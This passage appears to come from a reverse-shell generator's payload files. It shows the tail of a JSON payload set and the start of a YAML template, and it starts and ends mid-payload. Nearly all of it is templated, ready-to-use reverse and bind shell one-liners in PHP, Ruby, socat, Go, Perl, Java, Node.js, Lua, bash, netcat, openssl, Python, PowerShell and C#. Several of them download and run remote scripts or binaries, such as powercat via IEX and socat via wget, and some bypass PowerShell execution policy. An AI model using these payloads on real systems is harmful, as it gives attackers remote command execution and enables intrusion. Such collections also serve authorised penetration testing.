brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat['size'];if($this->os==='WINDOWS'&&$iname==='STDOUT'&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo\"{{$errno}}: {{$errstr}}\";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes as $pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,\"PID:{{$status['pid']}}\");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else if(feof($pipes[1])||!$status['running']){{break;}}$streams=array('read'=>array($socket,$pipes[1],$pipes[2]),'write'=>null,'except'=>null);$num_changed_streams=@stream_select($streams['read'],$streams['write'],$streams['except'],0);if($num_changed_streams===false){{break;}}else if($num_changed_streams>0){{if($this->os==='LINUX'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(in_array($pipes[2],$streams['read'])){{$this->rw($pipes[2],$socket,'STDERR','SOCKET');}}if(in_array($pipes[1],$streams['read'])){{$this->rw($pipes[1],$socket,'STDOUT','SOCKET');}}}}else if($this->os==='WINDOWS'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(($fstat=fstat($pipes[2]))&&$fstat['size']){{$this->brw($pipes[2],$socket,'STDERR','SOCKET');}}if(($fstat=fstat($pipes[1]))&&$fstat['size']){{$this->brw($pipes[1],$socket,'STDOUT','SOCKET');}}}}}}}}while(!$this->error);foreach($pipes as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new S('{host}',{port});$sh->run();unset($sh);?>"
104 |     },
105 |     "php-windows": {
106 |       "php": "echo \"<?php class S{{private $addr=null;private $port=null;private $os=null;private $s=null;private $descriptorspec=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));private $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private function detect(){{$detected=true;if(stripos(PHP_OS,'LINUX')!==false){{$this->os='LINUX';$this->s='/bin/sh';}}else if(stripos(PHP_OS,'WIN32')!==false||stripos(PHP_OS,'WINNT')!==false||stripos(PHP_OS,'WINDOWS')!==false){{$this->os='WINDOWS';$this->s='cmd.exe';}}else{{$detected=false;}}return $detected;}}private function daemonize(){{$exit=false;if(!function_exists('pcntl_fork')){{}}else if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else if(posix_setsid()<0){{}}else{{}}return $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private function dump($data){{$data=str_replace('<','&lt;',$data);$data=str_replace('>','&gt;',$data);}}private function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return $bytes;}}private function rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os==='WINDOWS'&&$oname==='STDIN'){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private function brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat['size'];if($this->os==='WINDOWS'&&$iname==='STDOUT'&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo\"{{$errno}}: {{$errstr}}\";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes as $pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,\"PID:{{$status['pid']}}\");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else if(feof($pipes[1])||!$status['running']){{break;}}$streams=array('read'=>array($socket,$pipes[1],$pipes[2]),'write'=>null,'except'=>null);$num_changed_streams=@stream_select($streams['read'],$streams['write'],$streams['except'],0);if($num_changed_streams===false){{break;}}else if($num_changed_streams>0){{if($this->os==='LINUX'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(in_array($pipes[2],$streams['read'])){{$this->rw($pipes[2],$socket,'STDERR','SOCKET');}}if(in_array($pipes[1],$streams['read'])){{$this->rw($pipes[1],$socket,'STDOUT','SOCKET');}}}}else if($this->os==='WINDOWS'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(($fstat=fstat($pipes[2]))&&$fstat['size']){{$this->brw($pipes[2],$socket,'STDERR','SOCKET');}}if(($fstat=fstat($pipes[1]))&&$fstat['size']){{$this->brw($pipes[1],$socket,'STDOUT','SOCKET');}}}}}}}}while(!$this->error);foreach($pipes as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new S('{host}',{port});$sh->run();unset($sh);?>\"|{binary_name}"
107 |     },
108 |     "ruby-linux": {
109 |       "ruby-spawn": "{binary_name} -rsocket -e\"spawn('{shell_path}',[:in,:out,:err]=>TCPSocket.new('{host}',{port}))\"",
110 |       "ruby-sprintf": "{binary_name} -rsocket -e\"f=TCPSocket.open('{host}',{port}).to_i;exec sprintf('{shell_path} -i <&%d >&%d 2>&%d',f,f,f)\"",
111 |       "ruby-new": "{binary_name} -rsocket -e \"exit if fork;c=TCPSocket.new('{host}',{port});loop{{c.gets.chomp!;(exit! if $_=='exit');($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){{|io|c.print io.read}}))rescue c.puts 'failed: #{{$_}}'}}\"",
112 |       "ruby-windows": "{binary_name} -rsocket -e \"c=TCPSocket.new('{host}','{port}');while(cmd=c.gets);IO.popen({shell_path},'r'){{|io|c.print io.read}}end\""
113 |     },
114 |     "socat": {
115 |       "socat": "{binary_name} {protocol}:{host}:{port} EXEC:{shell_path}{socat_args}",
116 |       "socat-tty": "{binary_name} {protocol}:{host}:{port} EXEC:'{shell_path}',pty,stderr,setsid,sigint,sane",
117 |       "socat-linux": "wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat;chmod +x /tmp/socat;/tmp/socat exec:'{shell_path} -li',pty,stderr,setsid,sigint,sane {protocol}:{host}:{port}"
118 |     },
119 |     "golang-linux": {
120 |       "golang": "echo 'package main;import\"os/exec\";import\"net\";func main(){{c,_:=net.Dial(\"tcp\",\"{host}:{port}\");cmd:=exec.Command(\"{shell_path}\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}'>/tmp/t.go &&{binary_name} run /tmp/t.go&&rm /tmp/t.go"
121 |     },
122 |     "golang-windows": {
123 |       "golang": "echo package main;import\"os/exec\";import\"net\";func main(){{c,_:=net.Dial(\"tcp\",\"{host}:{port}\");cmd:=exec.Command(\"{shell_path}\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}>%tmp%\\0.go&{binary_name} run %tmp%\\0.go&del %tmp%\\0.go %tmp%\\0"
124 |     },
125 |     "perl-linux": {
126 |       "perl": "{binary_name} -e 'use Socket;$i=\"{host}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"{protocol}\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"{shell_path} -i\");}};'",
127 |       "perl-2": "{binary_name} -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{host}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
128 |     },
129 |     "perl-windows": {
130 |       "perl": "{binary_name} -e \"use Socket;$i='{host}';$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname('{protocol}'));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('{shell_path}');}};\"",
131 |       "perl-2": "{binary_name} -MIO -e \"$c=new IO::Socket::INET(PeerAddr,'{host}:{port}');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\""
132 |     },
133 |     "java": {
134 |       "java-jar": "{binary_name} -jar Reverse_Shell.jar {host} {port}",
135 |       "java-jar-github": "wget -q https://raw.githubusercontent.com/ivan-sincek/java-reverse-tcp/main/jar/Reverse_Shell.jar -O 0&&java -jar 0 {host} {port}&&del 0||rm 0",
136 |       "java-jar3": "{binary_name} -jar JavaStager-0.1-initial.jar http://attackerip/payload.java",
137 |       "java-jsp": "https://github.com/tennc/webshell/blob/master/jsp/jsp-reverse.jsp",
138 |       "java-jsp2": "https://github.com/ivan-sincek/java-reverse-tcp/blob/main/jsp/reverse/jsp_reverse_shell.jsp",
139 |       "java-jsp-msfvenom": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port} -f raw>reverse.jsp",
140 |       "java-war-msfvenom": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port} -f war>reverse.war"
141 |     },
142 |     "nodejs-linux": {
143 |       "nodejs-async": "echo 'require(\"child_process\").exec(\"{shell_path} -i >& /dev/tcp/{host}/{port} 0>&1\")'|{binary_name}",
144 |       "nodejs-sync": "echo 'require(\"child_process\").execSync(\"{shell_path} -i >& /dev/tcp/{host}/{port} 0>&1\")'|{binary_name}",
145 |       "nodejs-spawn": "echo '!function(){{var e=require(\"net\"),n=require(\"child_process\"),r=n.spawn(\"{shell_path}\",[]),t=new e.Socket;return t.connect({port},\"{host}\",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();'|{binary_name}"
146 |     },
147 |     "nodejs-windows": {
148 |       "nodejs-async": "echo require('child_process').exec('nc -e {shell_path} {host} {port}')|{binary_name}",
149 |       "nodejs-sync": "echo require('child_process').execSync('nc -e {shell_path} {host} {port}')|{binary_name}",
150 |       "nodejs-spawn": "echo !function(){{var e=require(\"net\"),n=require(\"child_process\"),r=n.spawn(\"{shell_path}\",[]),t=new e.Socket;return t.connect({port},\"{host}\",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();|{binary_name}"
151 |     },
152 |     "lua": {
153 |       "lua5.1": "lua5.1 -e 'local host, port = \"{host}\", {port} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'",
154 |       "lua-linux": "{binary_name} -e \"require('socket');require('os');t=socket.tcp();t:connect('{host}','{port}');os.execute('{shell_path} -i <&3 >&3 2>&3');\""
155 |     },
156 |     "custom_payload_type": {
157 |       "custom_payload_name": "custom_payload_value"
158 |     }
159 |   },
160 |   "bind": {
161 |     "bash": {
162 |       "bash-bind": "rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port} >/tmp/m"
163 |     },
164 |     "netcat": {
165 |       "nc": "rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port} >/tmp/m",
166 |       "nc-e": "{binary_name} -Lnp {port} -e {shell_path}{nc_args}",
167 |       "ncat-e": "ncat -lnp {port} -e {shell_path}{ncat_args}",
168 |       "ncat-ssl": "ncat -lnp {port} -e {shell_path} --ssl",
169 |       "DotnetCat": "dncat -lp {port} -e {shell_path}"
170 |     },
171 |     "socat": {
172 |       "socat": "{binary_name} -d -d {protocol}4-LISTEN:{port} EXEC:'{shell_path}'{socat_args}",
173 |       "socat-ssl": "{binary_name} OPENSSL-LISTEN:{port},cert=bind.pem,verify=0,fork EXEC:'{shell_path}'{socat_args}"
174 |     },
175 |     "python": {
176 |       "python-bind": "{binary_name} -c \"import subprocess as u;c=__import__('socket').socket();c.bind(('{host}',{port}));c.listen(0);cc,a=c.accept();p=u.Popen(['{shell_path}'],stdin=u.PIPE,stdout=u.PIPE,stderr=u.STDOUT);r=__import__('threading').Thread(target=lambda:[cc.send(p.stdout.read(1024)) for _ in iter(int,1)],);r.start();[p.stdin.flush() for _ in iter(int, 1) if p.stdin.write(cc.recv(1024))]\"",
177 |       "pwncat": "pwncat -l {host} {port} -e {shell_path}{pwncat_args}"
178 |     },
179 |     "perl-linux": {
180 |       "perl-bind": "{binary_name} -e 'use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"{protocol}\"));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){{open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"{shell_path} -i\");}};'"
181 |     },
182 |     "perl-windows": {
183 |       "perl-bind": "{binary_name} -e \"use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname('{protocol}'));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){{open(STDIN,'>&C');open(STDOUT,'>&C');open(STDERR,'>&C');exec('{shell_path}');}};\""
184 |     },
185 |     "golang": {
186 |       "gotty-webshell": "gotty {gotty_args}-w --reconnect {shell_path}"
187 |     },
188 |     "custom_payload_type": {
189 |       "custom_payload_name": "custom_payload_value"
190 |     }
191 |   }
192 | }


--------------------------------------------------------------------------------
/payloads_template.yml:
--------------------------------------------------------------------------------
  1 | ---
  2 | reverse:
  3 |   bash:
  4 |     Bash-i: "{shell_path} -i >& /dev/{protocol}/{host}/{port} 0>&1"
  5 |     Bash-l: "{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1"
  6 |     Bash-p: "{shell_path} -p >& /dev/{protocol}/{host}/{port} 0>&1"
  7 |     Bash-c: "{shell_path} -c '{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1'"
  8 |     Bash196: 0<&196;exec 196<>/dev/{protocol}/{host}/{port}; sh <&196 >&196 2>&196
  9 |     Bash-readline: exec 5<>/dev/{protocol}/{host}/{port}; while read line 0<&5; do
 10 |       $line 2>&5 >&5; done
 11 |     Bash5: "{shell_path} -i 5<> /dev/{protocol}/{host}/{port} 0<&5 1>&5 2>&5"
 12 |     zsh: zsh -c 'zmodload zsh/net/tcp && ztcp {host} {port} && zsh >&$REPLY 2>&$REPLY
 13 |       0>&$REPLY'
 14 |   bash-password:
 15 |     Bash-i: "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path}
 16 |       -i;esac' >& /dev/{protocol}/{host}/{port} 0>&1"
 17 |     Bash-l: "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path}
 18 |       -l;esac' >& /dev/{protocol}/{host}/{port} 0>&1"
 19 |     Bash-p: "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path}
 20 |       -p;esac' >& /dev/{protocol}/{host}/{port} 0>&1"
 21 |   bash-ssl:
 22 |     Bash-i: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|openssl s_client
 23 |       -quiet -connect {host}:{port} >/tmp/f
 24 |     Bash-l: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -l 2>&1|openssl s_client
 25 |       -quiet -connect {host}:{port} >/tmp/f
 26 |     Bash-p: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -p 2>&1|openssl s_client
 27 |       -quiet -connect {host}:{port} >/tmp/f
 28 |   bash-ssl-password:
 29 |     Bash-i: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read
 30 |       k;case $k in '{password}'){shell_path} -i;esac'  2>&1|openssl s_client -quiet
 31 |       -connect {host}:{port} >/tmp/f
 32 |     Bash-l: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read
 33 |       k;case $k in '{password}'){shell_path} -l;esac'  2>&1|openssl s_client -quiet
 34 |       -connect {host}:{port} >/tmp/f
 35 |     Bash-p: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read
 36 |       k;case $k in '{password}'){shell_path} -p;esac'  2>&1|openssl s_client -quiet
 37 |       -connect {host}:{port} >/tmp/f
 38 |   netcat:
 39 |     nc: "{binary_name} -e {shell_path} {host} {port}{nc_args}"
 40 |     nc-c: "{binary_name} {host} {port} -c {shell_path}{nc_args}"
 41 |     ncat: ncat -e {shell_path} {host} {port}{ncat_args}
 42 |     ncat-c: ncat -c {shell_path} {host} {port}{ncat_args}
 43 |     nc-mkfifo: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|{binary_name}
 44 |       {host} {port} >/tmp/f
 45 |     nc-mknod: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -i 2>&1|{binary_name}
 46 |       {host} {port} >/tmp/f
 47 |     DotnetCat: dncat -e {shell_path} {host} -p {port}
 48 |   netcat-windows:
 49 |     nc: "{binary_name} -e {shell_path} {host} {port}{nc_args}"
 50 |     nc-c: "{binary_name} {host} {port} -c {shell_path}{nc_args}"
 51 |     ncat: ncat -e {shell_path} {host} {port}{ncat_args}
 52 |     ncat-c: ncat -c {shell_path} {host} {port}{ncat_args}
 53 |     DotnetCat: dncat -e {shell_path} {host} -p {port}
 54 |   netcat-password:
 55 |     nc-c: nc -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac'
 56 |       {host} {port}
 57 |     ncat-c: ncat -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path}
 58 |       -i;esac' {host} {port}
 59 |     nc-mkfifo: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read
 60 |       k;case $k in '{password}')bash -i;esac' 2>&1|{binary_name} {host} {port} >/tmp/f
 61 |     nc-mknod: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read
 62 |       k;case $k in "{password}")bash -i;esac' 2>&1|{binary_name} {host} {port} >/tmp/f
 63 |   netcat-ssl:
 64 |     ncat: ncat -e {shell_path} {host} {port} --ssl
 65 |     ncat-c: ncat -c {shell_path} {host} {port} --ssl
 66 |   netcat-ssl-password:
 67 |     ncat-c: ncat --ssl -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path}
 68 |       -i;esac' {host} {port}
 69 |   netcat-windows-password:
 70 |     ncat-c: '{binary_name}{ncat_args} -c "echo|set /p=%random%=&powershell $k=Read-Host;write-host
 71 |       $k=;if($k -eq ''{password}''){{{shell_path}}}" {host} {port}'
 72 |   telnet-linux:
 73 |     telnet: rm -f /tmp/p;mknod /tmp/p p && {binary_name} {host} {port} 0/tmp/p
 74 |     telnet-two_ports: "{binary_name} {host} {port}|{shell_path}|telnet {host} {port2}"
 75 |   openssl-linux:
 76 |     openssl: mkfifo /tmp/s;{shell_path} -i </tmp/s 2>&1|{binary_name} s_client -quiet
 77 |       -connect {host}:{port}>/tmp/s;rm /tmp/s
 78 |     openssl-2: mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect
 79 |       {host}:{port} > fifo; rm fifo
 80 |   python:
 81 |     python: '{binary_name} -c "import socket,threading as t,subprocess as s;c=socket.socket();c.connect((''{host}'',{port}));p=s.Popen(''{shell_path}'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush()
 82 |       for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode())
 83 |       for _ in iter(int,1)],).start();p.wait()"'
 84 |     python-exec: '{binary_name} -c "exec(''import os,socket,threading as t,subprocess
 85 |       as s\ndef i():\n while 1:\n  try:\n   p.stdin.write(c.recv(1024).decode());p.stdin.flush()\n  except:\n   os._exit(0)\ndef
 86 |       j():\n while 1:\n  try:c.send(p.stdout.read(1).encode())\n  except:pass\nc=socket.socket()\np=s.Popen(\''{shell_path}\'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\nfor
 87 |       _ in range(9):\n try:\n  c.connect((\''{host}\'',{port}));break\n except:\n  pass\nt.Thread(target=i,).start();t.Thread(target=j,).start()\np.wait()'')"'
 88 |     python-pty: '{binary_name} -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((''{host}'',{port}));os.dup2(s.fileno(),0);
 89 |       os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(''{shell_path}'')"'
 90 |     python-pty-short: '{binary_name} -c "a=__import__;s=a(''socket'');o=a(''os'').dup2;p=a(''pty'').spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect((''{host}'',{port}));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p(''{shell_path}'')"'
 91 |     python-subprocess1: '{binary_name} -c "socket=__import__(''socket'');subprocess=__import__(''subprocess'');os=__import__(''os'');s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((''{host}'',{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([''{shell_path}'',''-i''])"'
 92 |     python-subprocess2: '{binary_name} -c "a=__import__;b=a(''socket'').socket;p=a(''subprocess'').call;o=a(''os'').dup2;s=b();s.connect((''{host}'',{port}));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p([''{shell_path}'',''-i''])"'
 93 |     pwncat: pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args}
 94 |   python-windows:
 95 |     python: '{binary_name} -c "import socket,threading as t,subprocess as s;c=socket.socket();c.connect((''{host}'',{port}));p=s.Popen(''{shell_path}'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush()
 96 |       for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode())
 97 |       for _ in iter(int,1)],).start();p.wait()"'
 98 |     python-exec: '{binary_name} -c "exec(''import os,socket,threading as t,subprocess
 99 |       as s\ndef i():\n while 1:\n  try:\n   p.stdin.write(c.recv(1024).decode());p.stdin.flush()\n  except:\n   os._exit(0)\ndef
100 |       j():\n while 1:\n  try:c.send(p.stdout.read(1).encode())\n  except:pass\nc=socket.socket()\np=s.Popen(\''{shell_path}\'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\nfor
101 |       _ in range(9):\n try:\n  c.connect((\''{host}\'',{port}));break\n except:\n  pass\nt.Thread(target=i,).start();t.Thread(target=j,).start()\np.wait()'')"'
102 |     pwncat: pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args}
103 |   powershell:
104 |     powershell-1: '{binary_name} /nop /c "$client=New-Object System.Net.Sockets.TCPClient(''{host}'',{port});$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{{0}};while(($i=$stream.Read($bytes,0,$bytes.Length))
105 |       -ne 0){{;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex
106 |       $data 2>&1|Out-String);$sendback2= $sendback+''PS ''+(pwd).Path+''>'';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()"'
107 |     powershell-2: '{binary_name} /nop /noni /ep bypass /c "$TCPClient=New-Object Net.Sockets.TCPClient(''{host}'',{port});$NetworkStream=$TCPClient.GetStream();$StreamWriter=New-Object
108 |       IO.StreamWriter($NetworkStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+''>'');$StreamWriter.Flush()}}WriteToStream'''';while(($BytesRead=$NetworkStream.Read($Buffer,0,$Buffer.Length))
109 |       -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer, 0,$BytesRead-1);$Output=try{{Invoke-Expression
110 |       $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()"'
111 |     powershell-ssl: '{binary_name} /nop /noni /ep bypass /c "$TCPClient=New-Object
112 |       Net.Sockets.TCPClient(''{host}'',{port});$NetworkStream=$TCPClient.GetStream();$SslStream=New-Object
113 |       Net.Security.SslStream($NetworkStream,$false,({{$true}} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient(''cloudflare-dns.com'',$null,$false);if(!$SslStream.IsEncrypted
114 |       -or !$SslStream.IsSigned){{$SslStream.Close();exit}}$StreamWriter=New-Object
115 |       IO.StreamWriter($SslStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+''>'');$StreamWriter.Flush()}};WriteToStream'''';while(($BytesRead=$SslStream.Read($Buffer,0,$Buffer.Length))
116 |       -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer,0,$BytesRead-1);$Output=try{{Invoke-Expression
117 |       $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()"'
118 |     powershell-ConPty: '{binary_name} "IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1
119 |       -UseBasicParsing);Invoke-ConPtyShell {host} {port}"'
120 |     powercat-Github-1: '{binary_name} "IEX(IWR https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat
121 |       -c {host} -p {port} -e {shell_path}"'
122 |     powercat-Github-2: '{binary_name} "IEX(curl https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat
123 |       -c {host} -p {port} -e {shell_path}"'
124 |     powercat-Github-3: '{binary_name} "IEX(New-Object System.Net.WebClient).DownloadString(''https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'');powercat
125 |       -c {host} -p {port} -e {shell_path}"'
126 |   csharp:
127 |     csharp-csc: echo using System;using System.IO;using System.Net;using System.Net.Sockets;using
128 |       System.Text;using System.Diagnostics;public class i{{public static TcpClient
129 |       c;public static NetworkStream s;public static StreamReader r;public static StreamWriter
130 |       w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new
131 |       StringBuilder();if(!c.Connected){{try{{c.Connect("{host}",{port});s=c.GetStream();r=new
132 |       StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process
133 |       h;h=new Process();h.StartInfo.FileName="{shell_path}";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new
134 |       DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public
135 |       static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder
136 |       strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}}>%tmp%\0&&for,/f,%p,in,('where,/r,%systemroot%\Microsoft.NET\Framework,csc.exe'),do,%p
137 |       /out:%tmp%\0.exe %tmp%\0&&%tmp%\0.exe&&del,/q %tmp%\0.exe %tmp%\0
138 |     csharp-powershell-code: |-
139 |       $j=get-random;$d=@"
140 |       using System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class i$j{{public static TcpClient c;public static NetworkStream s;public static StreamReader r;public static StreamWriter w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new StringBuilder();if(!c.Connected){{try{{c.Connect("{host}",{port});s=c.GetStream();r=new StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process h;h=new Process();h.StartInfo.FileName="{shell_path}";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new 